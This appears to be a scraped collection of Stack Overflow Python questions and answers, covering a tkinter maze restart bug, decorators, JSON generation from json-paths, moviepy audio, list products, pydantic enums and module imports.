if playerX==COLUMN-2 and playerY==ROW-2 :
messagebox.showinfo("INFORMATION", "CONGRATULATIONS!!!")
can.delete("all")
## for widget in frame_top.winfo_children():
## widget.destroy()
new_game()
def new_game():
global player,playerX,playerY,beforeX,beforeY,departure,maze
departure = [[1, 1]]
playerX = 1
playerY = 1
beforeX = 1
beforeY = 1
maze = []
canMove = []
print (maze)
for y in range(ROW) :
sub = []
for x in range(COLUMN) :
if y==0 or y==ROW-1 or x==0 or x==COLUMN-1 :
sub.append("WALL")
else :
sub.append("FIELD")
maze.append(sub)
while len(departure)!=0 :
start = departure.pop(0)
x = start[0]
y = start[1]
dig(x, y)
print(x)
print(y)
for y in range(ROW):
for x in range(COLUMN):
if maze[y][x]=="PATH" :
color = "white"
else :
color = "black"
can.create_rectangle(x*SIZE, y*SIZE, (x+1)*SIZE, (y+1)*SIZE, fill=color, width=0)
can.create_rectangle((COLUMN-2)*SIZE, (ROW-2)*SIZE, (COLUMN-1)*SIZE, (ROW-1)*SIZE ,fill="red")
player = can.create_oval(playerX*SIZE+2, playerY*SIZE+2, (playerX+1)*SIZE-2, (playerY+1)*SIZE-2, fill="blue")
can.tag_raise(player)
global win
win = tk.Tk()
frame_top = tk.Frame(win)
frame_top.pack()
global can
can = tk.Canvas(frame_top, width=COLUMN*SIZE, height=ROW*SIZE)
can.pack()
m = tk.Menu(win)
win.config(menu=m)
fm = tk.Menu(m, tearoff=0)
om = tk.Menu(m, tearoff=0)
m.add_cascade(label='Options', menu=om)
om.add_command(label='New Game',command= new_game )
om.add_command(label='Settings', )
new_game()
win.bind("<Any-KeyPress>", keyPress)
win.mainloop()
| How to loop the maze | I'm a beginner with python. I couldn't figure out how to start new game in my maze.
I have tried various options but they all end whe with errors. What should I do? Thank you in advance.
I have tried destroy the frame_top where maze is located then create another maze with function new_game. But this function calls errors:
import tkinter as tk
import random
from tkinter import messagebox
global SIZE
global ROW
global COLUMN
SIZE = 10
COLUMN = 7
ROW = 7
departure = [[1, 1]]
playerX = 1
playerY = 1
beforeX = 1
beforeY = 1
maze = []
for y in range(ROW) :
sub = []
for x in range(COLUMN) :
if y==0 or y==ROW-1 or x==0 or x==COLUMN-1 :
sub.append("WALL")
else :
sub.append("FIELD")
maze.append(sub)
def dig(x, y) :
maze[y][x] = "PATH"
canMove = []
if maze[y-1][x]=="FIELD" and maze[y-2][x]=="FIELD" :
canMove.append("UP")
if maze[y+1][x]=="FIELD" and maze[y+2][x]=="FIELD" :
canMove.append("DOWN")
if maze[y][x-1]=="FIELD" and maze[y][x-2]=="FIELD" :
canMove.append("LEFT")
if maze[y][x+1]=="FIELD" and maze[y][x+2]=="FIELD" :
canMove.append("RIGHT")
if len(canMove)==0 :
return
direction = random.choice(canMove)
if direction=="UP" :
maze[y-1][x]="PATH"
maze[y-2][x]="PATH"
y -= 2
if direction=="DOWN" :
maze[y+1][x]="PATH"
maze[y+2][x]="PATH"
y += 2
if direction=="LEFT" :
maze[y][x-1]="PATH"
maze[y][x-2]="PATH"
x -= 2
if direction=="RIGHT" :
maze[y][x+1]="PATH"
maze[y][x+2]="PATH"
x += 2
departure.append([x, y])
dig(x, y)
## print(departure)
## print(dig(x, y))
def keyPress(event) :
global playerX,playerY,beforeX,beforeY
if event.keysym=="Up" and maze[playerY-1][playerX]=="PATH" :
beforeX = playerX
beforeY = playerY
playerY -=1
if event.keysym=="Down" and maze[playerY+1][playerX]=="PATH" :
beforeX = playerX
beforeY = playerY
playerY +=1
if event.keysym=="Left" and maze[playerY][playerX-1]=="PATH" :
beforeX = playerX
beforeY = playerY
playerX -=1
if event.keysym=="Right" and maze[playerY][playerX+1]=="PATH" :
beforeX = playerX
beforeY = playerY
playerX +=1
def move() :
can.create_oval(beforeX*SIZE+1, beforeY*SIZE+1, (beforeX+1)*SIZE-1, (beforeY+1)*SIZE-1, fill="white", width=0)
can.create_oval(playerX*SIZE+2, playerY*SIZE+2, (playerX+1)*SIZE-2, (playerY+1)*SIZE-2, fill="blue")
if playerX==COLUMN-2 and playerY==ROW-2 :
messagebox.showinfo("INFORMATION", "CONGRATULATIONS!!!")
frame_top.destroy()
## for widget in frame_top.winfo_children():
## widget.destroy()
new_game()
can.after(100, move)
def new_game():
departure = [[1, 1]]
playerX = 1
playerY = 1
beforeX = 1
beforeY = 1
maze = []
canMove = []
print (maze)
for y in range(ROW) :
sub = []
for x in range(COLUMN) :
if y==0 or y==ROW-1 or x==0 or x==COLUMN-1 :
sub.append("WALL")
else :
sub.append("FIELD")
maze.append(sub)
while len(departure)!=0 :
start = departure.pop(0)
x = start[0]
y = start[1]
dig(x, y)
print(x)
print(y)
for y in range(ROW):
for x in range(COLUMN):
if maze[y][x]=="PATH" :
color = "white"
else :
color = "black"
can.create_rectangle(x*SIZE, y*SIZE, (x+1)*SIZE, (y+1)*SIZE, fill=color, width=0)
can.create_rectangle((COLUMN-2)*SIZE, (ROW-2)*SIZE, (COLUMN-1)*SIZE, (ROW-1)*SIZE ,fill="red")
move()
global win
win = tk.Tk()
frame_top = tk.Frame(win)
frame_top.pack()
global can
can = tk.Canvas(frame_top, width=COLUMN*SIZE, height=ROW*SIZE)
can.pack()
m = tk.Menu(win)
win.config(menu=m)
fm = tk.Menu(m, tearoff=0)
om = tk.Menu(m, tearoff=0)
m.add_cascade(label='Options', menu=om)
om.add_command(label='New Game',command= new_game )
om.add_command(label='Settings', )
while len(departure)!=0 :
start = departure.pop(0)
x = start[0]
y = start[1]
dig(x, y)
print(x)
print(y)
for y in range(ROW):
for x in range(COLUMN):
if maze[y][x]=="PATH" :
color = "white"
else :
color = "black"
can.create_rectangle(x*SIZE, y*SIZE, (x+1)*SIZE, (y+1)*SIZE, fill=color, width=0)
can.create_rectangle((COLUMN-2)*SIZE, (ROW-2)*SIZE, (COLUMN-1)*SIZE, (ROW-1)*SIZE ,fill="red")
move()
win.bind("<Any-KeyPress>", keyPress)
win.mainloop()
main()
Exception in Tkinter callback
Traceback (most recent call last):
File "C:\Users\Admin\AppData\Local\Programs\Python\Python310\lib\tkinter\__init__.py", line 1921, in __call__
return self.func(*args)
File "C:\Users\Admin\AppData\Local\Programs\Python\Python310\lib\tkinter\__init__.py",
line 839, in callit
func(*args)
File "C:/Users/Admin/AppData/Local/Programs/Python/Python310/fileend.py",
line 92, in move
new_game()
File "C:/Users/Admin/AppData/Local/Programs/Python/Python310/fileend.py", line 128, in new_game
can.create_rectangle(x*SIZE, y*SIZE, (x+1)*SIZE, (y+1)*SIZE, fill=color, width=0)
File "C:\Users\Admin\AppData\Local\Programs\Python\Python310\lib\tkinter\__init__.py", line 2835, in create_rectangle
return self._create('rectangle', args, kw)
File "C:\Users\Admin\AppData\Local\Programs\Python\Python310\lib\tkinter\__init__.py", line 2805, in _create
return self.tk.getint(self.tk.call(
_tkinter.TclError: invalid command name ".!frame.!canvas"
| [
"You use two different ways to create a new game. So it's differ from each other and you do not understand what you make wrong.One them main flow and other one is new_game method. I just merged them.\nSecond thing is you destroy your frame and your canvas inside it. So you also destroyed your canvas this is why yo get errors. Instead can.delete(\"all\") going to clear all items inside.\nYou have keypress(event) function yo do not need to update tens of times every second your move(). Just if you get any press, simple update it by calling move function.\nOther thing is, when you are moving inside maze, instead of moving your player you are creating a new blue dot and repaint your old dot. It's bad habit you should avoid it. If it would be too much movement inside your maze, that mess would cause to slow down.\nLastly, in your new_game method you need to use global keyword otherwise your declerations only creates local variables.\nThis is full solution. It correctly starts new games and contains all improvements mentioned above.\nimport tkinter as tk\nimport random\nfrom tkinter import messagebox\n\nSIZE = 10\nCOLUMN = 7\nROW = 7\n\ndeparture = [[1, 1]] \nplayerX = 1\nplayerY = 1\nbeforeX = 1\nbeforeY = 1\n\nmaze = []\nplayer = None\nfor y in range(ROW) :\n sub = []\n for x in range(COLUMN) :\n if y==0 or y==ROW-1 or x==0 or x==COLUMN-1 :\n sub.append(\"WALL\")\n else :\n sub.append(\"FIELD\")\n maze.append(sub)\n\ndef dig(x, y) :\n maze[y][x] = \"PATH\"\n canMove = []\n if maze[y-1][x]==\"FIELD\" and maze[y-2][x]==\"FIELD\" :\n canMove.append(\"UP\")\n if maze[y+1][x]==\"FIELD\" and maze[y+2][x]==\"FIELD\" :\n canMove.append(\"DOWN\")\n if maze[y][x-1]==\"FIELD\" and maze[y][x-2]==\"FIELD\" :\n canMove.append(\"LEFT\")\n if maze[y][x+1]==\"FIELD\" and maze[y][x+2]==\"FIELD\" :\n canMove.append(\"RIGHT\")\n if len(canMove)==0 :\n return\n \n direction = random.choice(canMove)\n if direction==\"UP\" :\n maze[y-1][x]=\"PATH\"\n maze[y-2][x]=\"PATH\"\n y -= 2\n if direction==\"DOWN\" :\n maze[y+1][x]=\"PATH\"\n maze[y+2][x]=\"PATH\"\n y += 2\n if direction==\"LEFT\" :\n maze[y][x-1]=\"PATH\"\n maze[y][x-2]=\"PATH\"\n x -= 2\n if direction==\"RIGHT\" :\n maze[y][x+1]=\"PATH\"\n maze[y][x+2]=\"PATH\"\n x += 2\n departure.append([x, y]) \n dig(x, y) \n\n\ndef keyPress(event) :\n global playerX,playerY,beforeX,beforeY\n if event.keysym==\"Up\" and maze[playerY-1][playerX]==\"PATH\" :\n beforeX = playerX\n beforeY = playerY\n playerY -=1\n if event.keysym==\"Down\" and maze[playerY+1][playerX]==\"PATH\" :\n beforeX = playerX\n beforeY = playerY\n playerY +=1\n if event.keysym==\"Left\" and maze[playerY][playerX-1]==\"PATH\" :\n beforeX = playerX\n beforeY = playerY\n playerX -=1\n if event.keysym==\"Right\" and maze[playerY][playerX+1]==\"PATH\" :\n beforeX = playerX\n beforeY = playerY\n playerX +=1\n move()\n\ndef move() :\n can.moveto(player,playerX*SIZE+1, playerY*SIZE+1)\n print(playerX,playerY)\n if playerX==COLUMN-2 and playerY==ROW-2 :\n messagebox.showinfo(\"INFORMATION\", \"CONGRATULATIONS!!!\")\n can.delete(\"all\")\n## for widget in frame_top.winfo_children():\n## widget.destroy()\n new_game()\n\n \ndef new_game():\n global player,playerX,playerY,beforeX,beforeY,departure,maze\n departure = [[1, 1]] \n playerX = 1\n playerY = 1\n beforeX = 1\n beforeY = 1\n maze = []\n canMove = []\n print (maze)\n for y in range(ROW) :\n sub = []\n for x in range(COLUMN) :\n if y==0 or y==ROW-1 or x==0 or x==COLUMN-1 :\n sub.append(\"WALL\")\n else :\n sub.append(\"FIELD\")\n maze.append(sub)\n while len(departure)!=0 : \n start = departure.pop(0)\n x = start[0]\n y = start[1]\n dig(x, y)\n print(x)\n print(y)\n\n for y in range(ROW): \n for x in range(COLUMN):\n if maze[y][x]==\"PATH\" :\n color = \"white\"\n else :\n color = \"black\"\n can.create_rectangle(x*SIZE, y*SIZE, (x+1)*SIZE, (y+1)*SIZE, fill=color, width=0)\n\n can.create_rectangle((COLUMN-2)*SIZE, (ROW-2)*SIZE, (COLUMN-1)*SIZE, (ROW-1)*SIZE ,fill=\"red\") \n \n player = can.create_oval(playerX*SIZE+2, playerY*SIZE+2, (playerX+1)*SIZE-2, (playerY+1)*SIZE-2, fill=\"blue\")\n can.tag_raise(player)\n \n\n\n\nglobal win\nwin = tk.Tk()\nframe_top = tk.Frame(win)\nframe_top.pack()\n\nglobal can\ncan = tk.Canvas(frame_top, width=COLUMN*SIZE, height=ROW*SIZE)\ncan.pack()\n\n\n\nm = tk.Menu(win)\nwin.config(menu=m)\nfm = tk.Menu(m, tearoff=0)\n\nom = tk.Menu(m, tearoff=0)\nm.add_cascade(label='Options', menu=om)\nom.add_command(label='New Game',command= new_game )\n\nom.add_command(label='Settings', )\n\n\nnew_game()\n\n\nwin.bind(\"<Any-KeyPress>\", keyPress) \n\nwin.mainloop()\n\n"
] | [
0
] | [] | [] | [
"python",
"python_3.x",
"tkinter",
"tkinter_canvas"
] | stackoverflow_0074551500_python_python_3.x_tkinter_tkinter_canvas.txt |
Q:
Generate JSON object from json-path in python
I have a list of json path-s and some values for every path, for example:
bla.[0].ble with a value: 3
and I would like to generate a json object where to output will look like this:
{
"bla": [
{
"ble": 3
}
]
}
To find the expression in the json I used jsonpath-ng library, but now I want to do the other direction, and build json from json-paths.
Can you give me some advice how make this json-generator, which can be used for every json-path?
I tried to just loop through the keys and create list if needed, but maybe there is a more generic solution for this? (any open source library is also perfect if there is any)
A:
As a workaround my solution was to build a new dictionary using the expressions (or their hash) as keys and the values as the values:
generated_json[hash(bla.[0].ble)] = 3
So even though the json object doesn't match the expected output format, I can use this to lookup my expressions as they describe unique paths.
Please feel free to suggest any better solution as this is just a workaround.
| Generate JSON object from json-path in python | I have a list of json path-s and some values for every path, for example:
bla.[0].ble with a value: 3
and I would like to generate a json object where to output will look like this:
{
"bla": [
{
"ble": 3
}
]
}
To find the expression in the json I used jsonpath-ng library, but now I want to do the other direction, and build json from json-paths.
Can you give me some advice how make this json-generator, which can be used for every json-path?
I tried to just loop through the keys and create list if needed, but maybe there is a more generic solution for this? (any open source library is also perfect if there is any)
| [
"As a workaround my solution was to build a new dictionary using the expressions (or their hash) as keys and the values as the values:\ngenerated_json[hash(bla.[0].ble)] = 3\nSo even though the json object doesn't match the expected output format, I can use this to lookup my expressions as they describe unique paths.\nPlease feel free to suggest any better solution as this is just a workaround.\n"
] | [
0
] | [] | [] | [
"json",
"jsonpath",
"python"
] | stackoverflow_0074562160_json_jsonpath_python.txt |
Q:
Error occuring when I try to run decorator with @ - Python
I am having a problem with the following programm.
When I try to run decorator the easier way, using @ like this
def decorator1(fun):
def wrapper():
text = '------'
return text + '\n' + fun + '\n' + text
return wrapper()
def decorator2(fun):
def wrapper():
return fun.upper()
return wrapper()
@decorator1
@decorator2
def function():
return "Hey ya!"
print(function())
Following problems occurs:
Traceback (most recent call last):
File "C:\Python_projects\main.py", line 17, in <module>
def function():
File "C:\Python_projects\main.py", line 13, in decorator2
return wrapper()
File "C:\Python_projects\main.py", line 11, in wrapper
return fun.upper()
AttributeError: 'function' object has no attribute 'upper'
or when I switch the order of decorators then it goes like this:
Traceback (most recent call last):
File "C:\Python_projects\main.py", line 17, in <module>
def function():
File "C:\Python_projects\main.py", line 6, in decorator1
return wrapper()
File "C:\Python_projects\main.py", line 4, in wrapper
return text + '\n' + fun + '\n' + text
TypeError: can only concatenate str (not "function") to str
When I run the code in this way, then it works just fine:
def decorator1(fun):
def wrapper():
text = '------'
return text + '\n' + fun + '\n' + text
return wrapper()
def decorator2(fun):
def wrapper():
return fun.upper()
return wrapper()
def function():
return "Hey ya!"
print(decorator(decorator2(function())))
But it seems like using @ with decorators is much more popular. Do you have any idea what I am doing wrong?
A:
First of all, a decorator is a function that accepts a function and returns a function. Thus, do not call the wrapper, but return it. Moreover, the fun method should be called.
def decorator1(fun):
def wrapper():
text = "------"
return text + "\n" + fun() + "\n" + text
return wrapper
def decorator2(fun):
def wrapper():
return fun().upper()
return wrapper
@decorator1
@decorator2
def function():
return "Hey ya!"
print(function())
Note that those decorators will work only with functions (or callables in general) that return str and accept no arguments. Additionally, you can annotate the fun argument properly with Callable[[], str]:
from typing import Callable
def decorator1(fun: Callable[[], str]):
...
A:
A decorator is a function which is run on another function, as in a function object, not the result of another function.
So:
@decorator
def func():
...
Is equivalent to:
def func():
...
func = decorator(func)
Notice that the function func has never actually been called.
Therefore, within the wrapper function within the decorator, you actually need to call the function yourself. Use, for example, fun().upper(), not fun.upper().
Also, the wrapper function should never be called within the decorator; the function itself should be returned, so return wrapper not return wrapper().
Here is the corrected code:
def decorator1(fun):
def wrapper():
text = '------'
return text + '\n' + fun() + '\n' + text
return wrapper
def decorator2(fun):
def wrapper():
return fun().upper()
return wrapper
@decorator1
@decorator2
def function():
return "Hey ya!"
print(function())
| Error occuring when I try to run decorator with @ - Python | I am having a problem with the following programm.
When I try to run decorator the easier way, using @ like this
def decorator1(fun):
def wrapper():
text = '------'
return text + '\n' + fun + '\n' + text
return wrapper()
def decorator2(fun):
def wrapper():
return fun.upper()
return wrapper()
@decorator1
@decorator2
def function():
return "Hey ya!"
print(function())
Following problems occurs:
Traceback (most recent call last):
File "C:\Python_projects\main.py", line 17, in <module>
def function():
File "C:\Python_projects\main.py", line 13, in decorator2
return wrapper()
File "C:\Python_projects\main.py", line 11, in wrapper
return fun.upper()
AttributeError: 'function' object has no attribute 'upper'
or when I switch the order of decorators then it goes like this:
Traceback (most recent call last):
File "C:\Python_projects\main.py", line 17, in <module>
def function():
File "C:\Python_projects\main.py", line 6, in decorator1
return wrapper()
File "C:\Python_projects\main.py", line 4, in wrapper
return text + '\n' + fun + '\n' + text
TypeError: can only concatenate str (not "function") to str
When I run the code in this way, then it works just fine:
def decorator1(fun):
def wrapper():
text = '------'
return text + '\n' + fun + '\n' + text
return wrapper()
def decorator2(fun):
def wrapper():
return fun.upper()
return wrapper()
def function():
return "Hey ya!"
print(decorator(decorator2(function())))
But it seems like using @ with decorators is much more popular. Do you have any idea what I am doing wrong?
| [
"First of all, a decorator is a function that accepts a function and returns a function. Thus, do not call the wrapper, but return it. Moreover, the fun method should be called.\ndef decorator1(fun):\n def wrapper():\n text = \"------\"\n return text + \"\\n\" + fun() + \"\\n\" + text\n\n return wrapper\n\n\ndef decorator2(fun):\n def wrapper():\n return fun().upper()\n\n return wrapper\n\n\n@decorator1\n@decorator2\ndef function():\n return \"Hey ya!\"\n\n\nprint(function())\n\nNote that those decorators will work only with functions (or callables in general) that return str and accept no arguments. Additionally, you can annotate the fun argument properly with Callable[[], str]:\nfrom typing import Callable\n\n\ndef decorator1(fun: Callable[[], str]):\n ...\n\n",
"A decorator is a function which is run on another function, as in a function object, not the result of another function.\nSo:\n@decorator\ndef func():\n ...\n\nIs equivalent to:\ndef func():\n ...\nfunc = decorator(func)\n\nNotice that the function func has never actually been called.\nTherefore, within the wrapper function within the decorator, you actually need to call the function yourself. Use, for example, fun().upper(), not fun.upper().\nAlso, the wrapper function should never be called within the decorator; the function itself should be returned, so return wrapper not return wrapper().\nHere is the corrected code:\ndef decorator1(fun):\n def wrapper():\n text = '------'\n return text + '\\n' + fun() + '\\n' + text\n\n return wrapper\n\n\ndef decorator2(fun):\n def wrapper():\n return fun().upper()\n\n return wrapper\n\n@decorator1\n@decorator2\ndef function():\n return \"Hey ya!\"\n\n\nprint(function())\n\n"
] | [
0,
0
] | [] | [] | [
"decorator",
"python"
] | stackoverflow_0074603169_decorator_python.txt |
Q:
I want to insert an audio at a certain time on the video using moviepy.editor
I want to insert an audio at a certain time on the video using moviepy.editor, how do I do it?, or do you have another way? please show me.
Examples like this:enter image description here
I was expecting someone to answer me, because I searched for a long time but couldn't.
A:
you could use this :
clip.set_audio(CompositeAudioClip([audioclip.set_start(3)]))
and start your audio wherever you want
| I want to insert an audio at a certain time on the video using moviepy.editor | I want to insert an audio at a certain time on the video using moviepy.editor, how do I do it?, or do you have another way? please show me.
Examples like this:enter image description here
I was expecting someone to answer me, because I searched for a long time but couldn't.
| [
"you could use this :\nclip.set_audio(CompositeAudioClip([audioclip.set_start(3)]))\nand start your audio wherever you want\n"
] | [
0
] | [] | [] | [
"ffmpeg",
"moviepy",
"python"
] | stackoverflow_0074553269_ffmpeg_moviepy_python.txt |
Q:
Multiply list by all elements of the list except at it's own index
I'm trying to build a function that given a list will return a list with the elements multiplied together, excluding the element that was at the same index. For example for the list [1,2,3,4] it would return [2*3*4,1*3*4,1*2*3].
This is what I tried
import numpy as np
def my_function(ints):
products = np.ones(len(ints))
indices = range(0,len(ints))
for i in ints:
if i != indices[i]
products *=ints[i]
return products
I think my problem was that I was thinking that "i" would be referencing the indices rather than values of those indices.
How can I create something that will reference the indices rather than the values
Is there a better way to approach this?
A:
with numpy this is easy:
import numpy as np
def fun(input):
arr = np.array(input)
return arr.prod() / arr
A:
Taking from @interjay's comment:
from operator import mul
total = reduce(mul, ints)
multiplied = [total/y for y in ints]
A:
Solution with enumerate:
def my_function(ints):
res = []
for i, el in enumerate(ints):
res.append(reduce(lambda x, y: x*y, ints[:i] + ints[i+1:]))
return res
print my_function([1,2,3,4])
>>> [24, 12, 8, 6]
A:
with list comprehension
array_of_nums = np.random.rand(10)
[np.prod([i for x, i in enumerate(array_of_nums) if x != e]) for e, y in enumerate(array_of_nums)]
A:
without using division
import numpy as np
def remainingProduct(arr):
a = arr
list1 = []
n = len(arr)
for i in range(0, n):
b = a[0]
a.remove(a[0])
c = np.prod(a)
list1.append(c)
a.append(b)
return list1
# print(remainingProduct([3, 2, 1]))#[2, 3, 6].
A:
Here's an easy approach
def mul_numbers(nums):
new_arr = []
for i in range(len(nums)):
product = 1
for j in range(len(nums)):
if nums[i] != nums[j]:
product *= nums[j]
new_arr.append(product)
return new_arr
arr = [1, 2, 3, 4, 5]
result = mul_numbers(arr)
print(result)
>>> [120, 60, 40, 30, 24]
A:
Here's an approach using reduce:
from functools import reduce
from operator import mul
l = [1, 2, 2, 3, 4]
# Modified to work with lists that contain dupes thanks to the feedback in comments
print [reduce(mul, l[:i]+l[i+1:], 1) for i in xrange(len(l))]
>>> [48, 24, 24, 16, 12]
A:
The way to incorporate enumerate into your code is
import numpy as np
def intmult(ints):
products = np.ones(len(ints))
for i,j in enumerate(ints):
products *= ints[i]
for i,j in enumerate(products):
products[i] /= ints[i]
return products
Note that this doesn't cover the case where one of the elements is 0.
A:
without using any library
just dont forget to append new array for loop first with proper indentation.
def f(arr):
new_arr = []
for i in arr: #loop first
p = 1
for j in arr:
if i!=j:
p = p*j
new_arr.append(p) #append for loop first
return new_arr
arr = [2, 3, 4,5]
f(arr)
its bit confusing but works [not recommended]
def f(arr):
n = len(arr)
left = [1]*n
right = [1]*n
product_array = []
# build left array
for i in range(1,n):
left[i] = left[i-1] * arr[i-1]
# build right array
for i in range(1,n):
right[i] = right[i-1] * arr[::-1] [i-1]
# build product arr from subarrays
for i in range(n):
product_array.append(left[i] * right[::-1][i])
return product_array
arr = [2, 3, 4,5]
f(arr)
| Multiply list by all elements of the list except at it's own index | I'm trying to build a function that given a list will return a list with the elements multiplied together, excluding the element that was at the same index. For example for the list [1,2,3,4] it would return [2*3*4,1*3*4,1*2*3].
This is what I tried
import numpy as np
def my_function(ints):
products = np.ones(len(ints))
indices = range(0,len(ints))
for i in ints:
if i != indices[i]
products *=ints[i]
return products
I think my problem was that I was thinking that "i" would be referencing the indices rather than values of those indices.
How can I create something that will reference the indices rather than the values
Is there a better way to approach this?
| [
"with numpy this is easy:\nimport numpy as np\ndef fun(input):\n arr = np.array(input)\n return arr.prod() / arr\n\n",
"Taking from @interjay's comment:\nfrom operator import mul\n\ntotal = reduce(mul, ints)\nmultiplied = [total/y for y in ints]\n\n",
"Solution with enumerate:\ndef my_function(ints):\n res = []\n for i, el in enumerate(ints):\n res.append(reduce(lambda x, y: x*y, ints[:i] + ints[i+1:]))\n return res\n\nprint my_function([1,2,3,4])\n>>> [24, 12, 8, 6]\n\n",
"with list comprehension\narray_of_nums = np.random.rand(10)\n[np.prod([i for x, i in enumerate(array_of_nums) if x != e]) for e, y in enumerate(array_of_nums)]\n\n",
"without using division\n import numpy as np\n \n def remainingProduct(arr):\n a = arr\n list1 = []\n n = len(arr)\n for i in range(0, n):\n b = a[0]\n a.remove(a[0])\n c = np.prod(a)\n list1.append(c)\n a.append(b)\n return list1\n \n # print(remainingProduct([3, 2, 1]))#[2, 3, 6].\n\n",
"Here's an easy approach\ndef mul_numbers(nums):\n new_arr = []\n for i in range(len(nums)):\n product = 1\n for j in range(len(nums)):\n if nums[i] != nums[j]:\n product *= nums[j]\n new_arr.append(product)\n\n return new_arr\n\n\narr = [1, 2, 3, 4, 5]\nresult = mul_numbers(arr)\nprint(result)\n\n>>> [120, 60, 40, 30, 24]\n\n",
"Here's an approach using reduce:\nfrom functools import reduce\nfrom operator import mul\n\nl = [1, 2, 2, 3, 4]\n# Modified to work with lists that contain dupes thanks to the feedback in comments\nprint [reduce(mul, l[:i]+l[i+1:], 1) for i in xrange(len(l))]\n>>> [48, 24, 24, 16, 12]\n\n",
"The way to incorporate enumerate into your code is \nimport numpy as np\ndef intmult(ints):\n products = np.ones(len(ints))\n for i,j in enumerate(ints):\n products *= ints[i]\n for i,j in enumerate(products):\n products[i] /= ints[i]\n return products\n\nNote that this doesn't cover the case where one of the elements is 0.\n",
"without using any library\njust dont forget to append new array for loop first with proper indentation.\ndef f(arr):\n new_arr = []\n for i in arr: #loop first\n p = 1\n for j in arr:\n if i!=j:\n p = p*j\n new_arr.append(p) #append for loop first\n return new_arr\narr = [2, 3, 4,5]\nf(arr)\n\nits bit confusing but works [not recommended]\ndef f(arr):\n n = len(arr)\n left = [1]*n\n right = [1]*n\n product_array = []\n\n # build left array\n for i in range(1,n):\n left[i] = left[i-1] * arr[i-1]\n # build right array\n for i in range(1,n):\n right[i] = right[i-1] * arr[::-1] [i-1]\n \n # build product arr from subarrays\n for i in range(n):\n product_array.append(left[i] * right[::-1][i])\n return product_array\n\narr = [2, 3, 4,5]\nf(arr)\n\n"
] | [
5,
3,
2,
1,
1,
1,
0,
0,
0
] | [] | [] | [
"list",
"numpy",
"python"
] | stackoverflow_0036288124_list_numpy_python.txt |
Q:
How to pass dynamic strings to pydantic fields
I have this code in my framework on Python 3.10 + Pydantic
class DataInclude(BaseModel):
currencyAccount: Literal["CNY счет", "AMD счет", "RUB счет", "USD счет", "EUR счет", "GBP счет", "CHF счет"]
I want to learn how to do it right to use dynamic parameters in a string
name = (CNY, AMD, RUB, USD, EUR, GBP, CHF)
class DataInclude(BaseModel):
currencyAccount: Literal[f"{name}счет"]
With the help of regex I couldn't either
A:
As I mentioned in my comment already, you cannot dynamically specify a typing.Literal type.
Instead of doing that, you could just create your own enum.Enum to represent the valid currency options. Pydantic plays nicely with those. And the Enum functional API allows you to set it up dynamically.
from enum import Enum
from pydantic import BaseModel, ValidationError
CURRENCIES = (
"CNY",
"AMD",
"RUB",
"USD",
"EUR",
"GBP",
"CHF",
)
Currency = Enum(
"Currency",
((curr, f"{curr} счет") for curr in CURRENCIES),
type=str,
)
class Data(BaseModel):
currency: Currency
if __name__ == "__main__":
obj = Data(currency="CNY счет")
print(obj, "\n")
try:
Data(currency="foo")
except ValidationError as e:
print(e)
Output:
currency=<Currency.CNY: 'CNY счет'>
1 validation error for Data
currency
value is not a valid enumeration member ...
The drawback to the Enum functional API is that your average static type checker will not be able to infer any enumeration members. Thus, your IDE will probably not provide you with auto-suggestions, if you wanted to use a member like Currency.AMD for example. If that bothers you, consider using the regular class definition for that Currency enum.
| How to pass dynamic strings to pydantic fields | I have this code in my framework on Python 3.10 + Pydantic
class DataInclude(BaseModel):
currencyAccount: Literal["CNY счет", "AMD счет", "RUB счет", "USD счет", "EUR счет", "GBP счет", "CHF счет"]
I want to learn how to do it right to use dynamic parameters in a string
name = (CNY, AMD, RUB, USD, EUR, GBP, CHF)
class DataInclude(BaseModel):
currencyAccount: Literal[f"{name}счет"]
With the help of regex I couldn't either
| [
"As I mentioned in my comment already, you cannot dynamically specify a typing.Literal type.\nInstead of doing that, you could just create your own enum.Enum to represent the valid currency options. Pydantic plays nicely with those. And the Enum functional API allows you to set it up dynamically.\nfrom enum import Enum\n\nfrom pydantic import BaseModel, ValidationError\n\n\nCURRENCIES = (\n \"CNY\",\n \"AMD\",\n \"RUB\",\n \"USD\",\n \"EUR\",\n \"GBP\",\n \"CHF\",\n)\n\nCurrency = Enum(\n \"Currency\",\n ((curr, f\"{curr} счет\") for curr in CURRENCIES),\n type=str,\n)\n\n\nclass Data(BaseModel):\n currency: Currency\n\n\nif __name__ == \"__main__\":\n obj = Data(currency=\"CNY счет\")\n print(obj, \"\\n\")\n try:\n Data(currency=\"foo\")\n except ValidationError as e:\n print(e)\n\nOutput:\ncurrency=<Currency.CNY: 'CNY счет'> \n\n1 validation error for Data\ncurrency\n value is not a valid enumeration member ...\n\nThe drawback to the Enum functional API is that your average static type checker will not be able to infer any enumeration members. Thus, your IDE will probably not provide you with auto-suggestions, if you wanted to use a member like Currency.AMD for example. If that bothers you, consider using the regular class definition for that Currency enum.\n"
] | [
2
] | [] | [] | [
"pydantic",
"python"
] | stackoverflow_0074602819_pydantic_python.txt |
Q:
Python imports: module not found from same level module
In the terminal
> python mod1/script1.py
>> ModuleNotFoundError: No module named 'mod2'
I have followed the guide about imports and numerous other stack overflows about htis very basic problem, and I don't get why it's not working. Pylance is able to resolve the modules. - Using Python 3.10.7 64-bit.
Every module has __init__.py.
Directory structure as in screencap
root
-mod1
--script1.py
--__init__.py
-mod2
--script2.py
--__init__.py
A:
you want to import a module from a different directory , am I understood correctly?
so python will only look for the files & modules in its current directory and
you cannot refer to another directory simply by putting the folder name before the module name
you must import the path of a different directory , using sys module
so python will look for the module in another path if it doesn't exist in the current path.
# import the sys module
import sys
# enter the full direction of the package
sys.path.insert(0 , 'C:\\Users\\name\\desktop\\folder\\mod2')
# then import module
import script2 as lib
lib.call()
| Python imports: module not found from same level module |
In the terminal
> python mod1/script1.py
>> ModuleNotFoundError: No module named 'mod2'
I have followed the guide about imports and numerous other stack overflows about htis very basic problem, and I don't get why it's not working. Pylance is able to resolve the modules. - Using Python 3.10.7 64-bit.
Every module has __init__.py.
Directory structure as in screencap
root
-mod1
--script1.py
--__init__.py
-mod2
--script2.py
--__init__.py
| [
"you want to import a module from a different directory , am I understood correctly?\nso python will only look for the files & modules in its current directory and\nyou cannot refer to another directory simply by putting the folder name before the module name\n\nyou must import the path of a different directory , using sys module\nso python will look for the module in another path if it doesn't exist in the current path.\n# import the sys module\nimport sys\n# enter the full direction of the package \nsys.path.insert(0 , 'C:\\\\Users\\\\name\\\\desktop\\\\folder\\\\mod2')\n# then import module\nimport script2 as lib\nlib.call()\n\n\n\n"
] | [
0
] | [] | [] | [
"import",
"python"
] | stackoverflow_0074602687_import_python.txt |
Q:
